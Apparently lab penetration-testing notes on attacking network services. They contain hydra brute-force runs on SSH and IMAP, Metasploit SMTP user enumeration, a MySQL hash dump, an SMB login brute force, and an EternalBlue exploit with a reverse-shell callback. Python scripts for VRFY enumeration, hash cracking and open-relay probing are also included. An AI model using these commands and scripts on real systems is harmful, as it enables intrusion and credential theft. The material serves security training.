Use encrypted protocol layers (TLS, SSH) on every service so that traffic cannot be sniffed in transit.

From a security perspective, the goal is to uphold the CIA triad (Confidentiality, Integrity, Availability) and to prevent its opposite, the DAD triad (Disclosure, Alteration, Destruction).

Network vulnerabilities

Unauthorized devices

ARP spoofing (arpwatch logs MAC/IP pairing changes) → https://linux.die.net/man/8/arpwatch

DNS Tunneling attacks

Wireless access

Firewall issues

Sniffing attacks

Once an attacker has access to the LAN, they can sniff traffic from a Man-in-the-Middle (MITM) position, for example by ARP spoofing the gateway. Several tools exist for this.

Password attacks

We can attack network services with a tool like hydra. For instance, we can launch a dictionary attack against the IMAP service of the target for the user lazie:

hydra -l lazie -P /usr/share/wordlists/rockyou.txt <ip> imap

Application attacks

Telnet

Telnet carries the login and the whole session in cleartext, so any sniffer on the path captures the credentials; SSH replaces it.

FTP

Classic FTP also sends credentials and data unencrypted; FTPS (FTP over TLS) or SFTP avoid that:

https://www.jscape.com/blog/countering-packet-sniffers-using-encrypted-ftp

NFS

When we discover that an NFS service is enabled on the remote server, we enumerate it (exported shares and their permissions) to identify a potential attack path through NFS.

SMTP

First, we identify that the remote server runs Postfix (the banner in the scan below confirms it). Then we enumerate SMTP to find a potential attack path; Metasploit gathers version information with:

# msfconsole
msf6 > use auxiliary/scanner/smtp/smtp_version
msf6 auxiliary(scanner/smtp/smtp_version) > show options # to show options
Module options (auxiliary/scanner/smtp/smtp_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/usin
                                       g-metasploit/basics/using-metasploit.html
   RPORT    25               yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smtp/smtp_version) > set RHOSTS <ip>
msf6 auxiliary(scanner/smtp/smtp_version) > exploit # run the module (run is an alias)

[+] 10.10.172.108:25      - 10.10.172.108:25 SMTP 220 polosmtp.home ESMTP Postfix (Ubuntu)\x0d\x0a
[*] 10.10.172.108:25      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

To enumerate valid usernames on the SMTP service (smtp_enum probes each name from USER_FILE with VRFY, falling back to RCPT TO when VRFY is disabled):

msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   RHOSTS                                  yes       The target host(s), see https://docs.metasploit
                                                     .com/docs/using-metasploit/basics/using-metaspl
                                                     oit.html
   RPORT      25                           yes       The target port (TCP)
   THREADS    1                            yes       The number of concurrent threads (max one per h
                                                     ost)
   UNIXONLY   true                         yes       Skip Microsoft bannered servers when testing un
                                                     ix users
   USER_FILE  /opt/metasploit-framework/e  yes       The file that contains a list of probable users
              mbedded/framework/data/word             accounts.
              lists/unix_users.txt

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE
USER_FILE => /opt/metasploit-framework/embedded/framework/data/wordlists/unix_users.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.172.108
RHOSTS => 10.10.172.108
msf6 auxiliary(scanner/smtp/smtp_enum) > exploit
[*] 10.10.172.108:25      - 10.10.172.108:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
[+] 10.10.172.108:25      - 10.10.172.108:25 Users found: , _apt, administrator, backup, bin, daemon, dnsmasq, games, gnats, irc, landscape, list, lp, lxd, mail, man, messagebus, news, nobody, pollinate, postfix, postmaster, proxy, sshd, sync, sys, syslog, systemd-network, systemd-resolve, systemd-timesync, uucp, uuidd, www-data
[*] 10.10.172.108:25      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
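The exchange that smtp_enum automates, written out as an added example (not the notes' own code and not Metasploit's): one VRFY probe per candidate name, with the reply code classified the way the module does. The FakePostfix class and its user list are constructed stand-ins modelled on the 252 / 550 replies Postfix gives; enumerate_over_network is the same logic wired to the standard smtplib client and assumes network reach to the target.

```python
"""SMTP username enumeration with VRFY (added example, not from the notes or Metasploit)."""
import smtplib
from typing import Callable, List, Tuple

Reply = Tuple[int, bytes]            # what smtplib.SMTP.verify returns: (code, text)


def classify_vrfy(code: int) -> str:
    """Map a VRFY reply code to a verdict.

    250: address verified; 252: server cannot verify but accepts the name
    (Postfix answers 252 for every local user it knows); 550/551/553: unknown
    or rejected; 502: VRFY is disabled (disable_vrfy_command = yes in Postfix).
    """
    if code in (250, 252):
        return "exists"
    if code == 502:
        return "disabled"
    return "unknown"


def enumerate_users(verify: Callable[[str], Reply], candidates: List[str]) -> Tuple[List[str], bool]:
    """Send one VRFY per candidate and return (confirmed users, vrfy_disabled).

    `verify` has the signature of smtplib.SMTP.verify, so the real client
    plugs straight in; stops at the first 502 since further probes are useless.
    """
    found: List[str] = []
    for name in candidates:
        name = name.strip()
        if not name:                      # blank wordlist lines
            continue
        code, _text = verify(name)
        verdict = classify_vrfy(code)
        if verdict == "disabled":
            return found, True
        if verdict == "exists":
            found.append(name)
    return found, False


def enumerate_over_network(host: str, candidates: List[str], port: int = 25) -> Tuple[List[str], bool]:
    """Same enumeration against a live server (assumes the target is reachable)."""
    with smtplib.SMTP(host, port, timeout=10) as smtp:
        smtp.ehlo_or_helo_if_needed()
        return enumerate_users(smtp.verify, candidates)


class FakePostfix:
    """Constructed stand-in reproducing Postfix's VRFY replies; not a real server."""

    def __init__(self, local_users: List[str], vrfy_enabled: bool = True) -> None:
        self.local_users = set(local_users)
        self.vrfy_enabled = vrfy_enabled

    def verify(self, name: str) -> Reply:
        if not self.vrfy_enabled:
            return 502, b"5.5.1 VRFY command is disabled"
        if name in self.local_users:
            return 252, f"2.0.0 {name}".encode()
        return 550, f"5.1.1 <{name}>: Recipient address rejected: User unknown in local recipient table".encode()


# Constructed wordlist and user set; a real run would feed unix_users.txt.
CANDIDATES = ["root", "administrator", "", "alice", "postfix", "www-data"]
SERVER = FakePostfix(["administrator", "postfix", "www-data", "mail"])

if __name__ == "__main__":
    users, disabled = enumerate_users(SERVER.verify, CANDIDATES)
    print("VRFY disabled" if disabled else f"Users found: {', '.join(users)}")
```

When the server answers 502, the same loop works over RCPT TO: send MAIL FROM once, then RCPT TO:<name> per candidate and treat 250 as an existing user. Either way the probes are noisy (one command per name, all logged by the MTA), which is why this is an enumeration step and not a stealthy one.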

The enumeration confirms administrator as a system account. Now that we know a username, we can try to brute-force its SSH password with hydra (this run targets 10.10.134.125):

hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.134.125 ssh
[22][ssh] host: 10.10.134.125   login: administrator   password: alejandro
[STATUS] attack finished for 10.10.134.125 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2023-12-10 15:02:24

Hydra found administrator:alejandro. The restore file warning and the "16 targets did not complete" errors come from -t 16: OpenSSH caps concurrent unauthenticated connections (MaxStartups), so most parallel tasks get dropped; hydra itself recommends -t 4 for ssh. We can now log in over SSH as administrator with the recovered password.

MySQL

First, we enumerate the server before attacking it. In the TCP connect scan (-sT) below, the MySQL port 3306 is open:

# nmap -sT 10.10.21.155

Starting Nmap 7.60 ( https://nmap.org ) at 2023-12-11 17:51 GMT
Nmap scan report for ip-10-10-21-155.eu-west-1.compute.internal (10.10.21.155)
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3306/tcp open  mysql
MAC Address: 02:1F:5A:23:B2:CB (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

With valid database credentials (here root / password), we can run SQL statements through the mysql_sql module; its default statement is select version():

# msfconsole
msf6 > use auxiliary/admin/mysql/mysql_sql
msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
USERNAME => root
msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.10.21.155
RHOSTS => 10.10.21.155
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.21.155

[*] 10.10.21.155:3306 - Sending statement: 'select version()'...
[*] 10.10.21.155:3306 -  | 5.7.29-0ubuntu0.18.04.1 |
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
SQL => show databases
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.21.155

[*] 10.10.21.155:3306 - Sending statement: 'show databases'...
[*] 10.10.21.155:3306 -  | information_schema |
[*] 10.10.21.155:3306 -  | mysql |
[*] 10.10.21.155:3306 -  | performance_schema |
[*] 10.10.21.155:3306 -  | sys |
[*] Auxiliary module execution completed

Now, we can dump the password hashes of the database accounts (this also needs valid credentials; here root / password):

msf6 > use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 10.10.21.155
RHOSTS => 10.10.21.155
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(scanner/mysql/mysql_hashdump) > exploit

[+] 10.10.21.155:3306     - Saving HashString as Loot: root:
[+] 10.10.21.155:3306     - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.21.155:3306     - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.21.155:3306     - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] 10.10.21.155:3306     - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.10.21.155:3306     - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
[*] 10.10.21.155:3306     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Under the hood the module runs this query against the mysql.user table (in MySQL 5.7 the hash column is authentication_string):

SELECT user,authentication_string from mysql.user

The dumped strings are mysql_native_password hashes: a * followed by the uppercase hex of SHA1(SHA1(password)), with no salt. The *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE value marks locked system accounts, and an empty value means the row has no password or uses another plugin (such as auth_socket), so only the remaining entries can be cracked offline, for example with hashcat -m 300 or john --format=mysql-sha1.
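Cracking the dump offline, as an added example (not the notes' own code and not what Metasploit, hashcat or john do internally): it re-creates the mysql_native_password scheme, filters the loot lines shown above, and runs a dictionary attack. The hash lines are the ones from the dump; the four-word WORDLIST is a constructed stand-in for rockyou.txt.

```python
"""Dictionary attack on mysql_native_password hashes (added example, not from the notes)."""
import hashlib
import re
from typing import Dict, Iterable, List

HASH_RE = re.compile(r"^\*[0-9A-F]{40}$")   # '*' + 40 uppercase hex digits


def mysql_native_hash(password: str) -> str:
    """mysql_native_password (MySQL 4.1+): '*' + SHA1(SHA1(password)) in uppercase hex.

    No salt is involved, so equal passwords give equal hashes and one candidate
    hash can be compared against every user at once.
    """
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def parse_hashdump(lines: Iterable[str]) -> Dict[str, str]:
    """Turn 'user:hash' loot lines into {user: hash}, keeping only crackable entries.

    An empty hash means the row has no password or uses another plugin
    (auth_socket on Ubuntu); the *THISISNOTAVALIDPASSWORD... sentinel marks
    locked accounts. Both fail HASH_RE and are dropped.
    """
    hashes: Dict[str, str] = {}
    for line in lines:
        user, sep, hashval = line.strip().partition(":")
        if not sep or not HASH_RE.match(hashval):
            continue
        hashes[user] = hashval       # for a user listed twice the last row wins
    return hashes


def crack(hashes: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Hash each candidate once and look it up against all users at the same time."""
    by_hash: Dict[str, List[str]] = {}
    for user, h in hashes.items():
        by_hash.setdefault(h, []).append(user)
    cracked: Dict[str, str] = {}
    for word in wordlist:
        word = word.rstrip("\r\n")
        for user in by_hash.get(mysql_native_hash(word), []):
            cracked[user] = word
    return cracked


# Loot lines exactly as mysql_hashdump printed them above; WORDLIST is a constructed
# stand-in for rockyou.txt.
HASHDUMP = [
    "root:",
    "mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE",
    "mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE",
    "debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E",
    "root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19",
    "carl:*EA031893AA21444B170FC2162A56978B8CEECE18",
]
WORDLIST = ["123456", "password", "letmein", "qwerty"]

if __name__ == "__main__":
    for user, pw in crack(parse_hashdump(HASHDUMP), WORDLIST).items():
        print(f"{user}:{pw}")
```

Because the scheme is unsalted, the lookup direction is reversed compared with a per-user attack: every wordlist entry is hashed once and checked against all dumped hashes, which is also why precomputed tables work against this format and why MySQL 8 moved to caching_sha2_password.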

SMB attack

We can brute-force an SMB login with Metasploit:

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.154.214
msf6 auxiliary(scanner/smb/smb_login) > set RPORT 445
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser penny
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE <path to a wordlist>
msf6 auxiliary(scanner/smb/smb_login) > exploit
[*] 10.10.154.214:445     - 10.10.154.214:445 - Starting SMB login bruteforce
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:95',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:98',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:2003',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:2008',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:111111',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:football',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:goat',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:goat',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:god',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:guessme',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:hugs',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:letmein',
[+] 10.10.154.214:445     - 10.10.154.214:445 - Success: '.\penny:leo1234'
[*] 10.10.154.214:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

We can check whether the host is vulnerable to MS17-010 (EternalBlue) with the scanner module; the first run against port 139 fails to reach the IPC$ tree, and retrying on 445 gives the verdict:

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.25.166
RHOSTS => 10.10.25.166
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RPORT 139
RPORT => 139
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit

[-] 10.10.25.166:139      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.10.25.166:139      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RPORT 445
RPORT => 445
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 10.10.25.166:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.25.166:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The MS17-010 security bulletin: https://learn.microsoft.com/fr-fr/security-updates/securitybulletins/2017/ms17-010

Then we launch the EternalBlue exploit module against the same host. The exploit re-runs the scanner as its check first; payload 2 in the module's payload list is generic/shell_reverse_tcp, with the handler listening on LHOST 10.10.14.170:

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.25.166
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.170
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 2
payload => generic/shell_reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.14.170:4444 
[*] 10.10.25.166:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.25.166:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.25.166:445      - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.25.166:445 - The target is vulnerable.
[*] 10.10.25.166:445 - Connecting to target for exploitation.
[+] 10.10.25.166:445 - Connection established for exploitation.
[+] 10.10.25.166:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.25.166:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.25.166:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.25.166:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.25.166:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.25.166:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.25.166:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.25.166:445 - Sending all but last fragment of exploit packet

SMTP relay

Metasploit can also test whether the SMTP server accepts mail from an arbitrary sender to an arbitrary external recipient (an open relay):

msf6 > use auxiliary/scanner/smtp/smtp_relay
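What the smtp_relay module tests, as an added example (not the notes' own code and not Metasploit's): MAIL FROM an address in one foreign domain, RCPT TO an address in another, then inspect the reply to RCPT. FakePostfix is a constructed stand-in modelling a Postfix with the default relay restrictions (454 4.7.1 Relay access denied) or, when misconfigured, a 250; relay_probe_over_network wires the same check to smtplib and assumes network reach to the target. The probe addresses are assumptions.

```python
"""Open-relay check, the test auxiliary/scanner/smtp/smtp_relay automates (added example, not from the notes)."""
import smtplib
from typing import Callable, Dict, List, Tuple

Reply = Tuple[int, bytes]


def relay_probe(mail: Callable[[str], Reply], rcpt: Callable[[str], Reply],
                rset: Callable[[], Reply], sender: str, recipient: str) -> Dict[str, object]:
    """Run MAIL FROM / RCPT TO with two foreign addresses and reset without sending.

    250 on RCPT means the server agreed to relay between domains it does not
    host: an open relay. 4xx/5xx on RCPT is the expected refusal. The probe
    ends with RSET so no message is ever queued. The recipient must be in a
    domain the target does not host, otherwise a 250 is just normal delivery.
    """
    code, text = mail(sender)
    if code != 250:
        rset()
        return {"open_relay": False, "stage": "MAIL FROM", "code": code,
                "reply": text.decode(errors="replace")}
    code, text = rcpt(recipient)
    rset()
    return {"open_relay": code == 250, "stage": "RCPT TO", "code": code,
            "reply": text.decode(errors="replace")}


def relay_probe_over_network(host: str, sender: str, recipient: str, port: int = 25) -> Dict[str, object]:
    """Same probe against a live server (assumes network reach to the target)."""
    with smtplib.SMTP(host, port, timeout=10) as smtp:
        smtp.ehlo_or_helo_if_needed()
        return relay_probe(smtp.mail, smtp.rcpt, smtp.rset, sender, recipient)


class FakePostfix:
    """Constructed stand-in for a Postfix relay policy; not a real server."""

    def __init__(self, hosted_domains: List[str], open_relay: bool = False) -> None:
        self.hosted = set(hosted_domains)
        self.open_relay = open_relay

    def mail(self, sender: str) -> Reply:
        return 250, b"2.1.0 Ok"

    def rcpt(self, recipient: str) -> Reply:
        domain = recipient.rsplit("@", 1)[-1]
        if self.open_relay or domain in self.hosted:
            return 250, b"2.1.5 Ok"
        # default smtpd_relay_restrictions: defer_unauth_destination
        return 454, f"4.7.1 <{recipient}>: Relay access denied".encode()

    def rset(self) -> Reply:
        return 250, b"2.0.0 Ok"


# Assumed probe addresses: neither domain is hosted by the target.
SENDER = "probe@attacker.example"
RECIPIENT = "victim@elsewhere.example"


def probe(server: FakePostfix, sender: str = SENDER, recipient: str = RECIPIENT) -> Dict[str, object]:
    """Run relay_probe against a constructed server (convenience for the demo)."""
    return relay_probe(server.mail, server.rcpt, server.rset, sender, recipient)


if __name__ == "__main__":
    print("hardened:", probe(FakePostfix(["polosmtp.home"])))
    print("misconfigured:", probe(FakePostfix(["polosmtp.home"], open_relay=True)))
```

A 250 on RCPT is strong but not absolute evidence: some MTAs accept at RCPT time and bounce later, so a definitive test sends a real message to a mailbox you control and watches whether it arrives. The hardening on the Postfix side is the default smtpd_relay_restrictions, which only relays for mynetworks or SASL-authenticated clients.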
